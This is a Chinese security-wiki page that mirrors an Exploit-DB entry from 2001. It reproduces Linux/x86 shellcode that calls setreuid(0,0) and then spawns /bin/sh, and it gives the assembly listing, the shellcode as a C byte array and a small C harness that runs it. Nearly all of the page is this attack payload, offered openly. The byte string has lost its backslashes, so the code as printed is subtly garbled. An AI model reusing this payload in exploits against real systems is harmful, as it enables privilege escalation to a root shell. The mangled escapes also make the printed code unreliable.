Linux/x86 – setreuid(0,0) + execve(/bin/sh) Shellcode (46+ bytes)-安全小百科

Linux/x86 – setreuid(0,0) + execve(/bin/sh) Shellcode (46+ bytes)

漏洞ID	1053531	漏洞类型
发布时间	2001-05-07	更新时间	2001-05-07
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13458

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/*
 * $Id: execve-setreuid.c,v 1.1 2001/05/02 18:10:52 raptor Exp $
 *
 * execve-setreuid.c v1.0 - shellcode for Linux/i386
 * Copyright (c) 2001 Raptor <[email protected]>
 *
 * This shellcode does an execve of /bin/sh
 * after a setreuid(0, 0), then exit()s.
 *
 */
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * ASM Code                                              *
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * ; setreuid(0, 0)
 * xorl %eax,%eax
 * xorl %ebx,%ebx
 * xorl %ecx,%ecx
 * movb $70,%al
 * int $0x80
 *
 * ; execve(foo[0], foo, 0);
 * jmp 0x1d
 * popl %esi
 * movb %eax,0x7(%esi)
 * movl %eax,0xc(%esi)
 * movl %esi,0x8(%esi)
 * movl %esi,%ebx
 * leal 0x8(%esi),%ecx
 * leal 0xc(%esi),%edx
 * movb $11,%al
 * int $0x80
 *
 * ; exit(0)
 * xorl %eax,%eax
 * xorl %ebx,%ebx
 * incl %eax
 * int $0x80
 *
 * call -0x22
 * .ascii "/bin/sh"
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

char code[] =
  "x31xc0x31xdbx31xc9xb0x46xcdx80xebx1d"
  "x5ex88x46x07x89x46x0cx89x76x08x89xf3"
  "x8dx4ex08x8dx56x0cxb0x0bxcdx80x31xc0"
  "x31xdbx40xcdx80xe8xdexffxffxff/bin/sh";

main()
{
  int (*funct)();
  funct = (int (*)()) code;
  (int)(*funct)();
}


// milw0rm.com [2001-05-07]

相关推荐: SCO cu Vulnerability

SCO cu Vulnerability 漏洞ID 1104398 漏洞类型 Unknown 发布时间 2000-02-08 更新时间 2000-02-08 CVE编号 N/A CNNVD-ID N/A 漏洞平台 N/A CVSS评分 N/A |漏洞来源 ht…

文章版权归作者所有，未经允许请勿转载。

THE END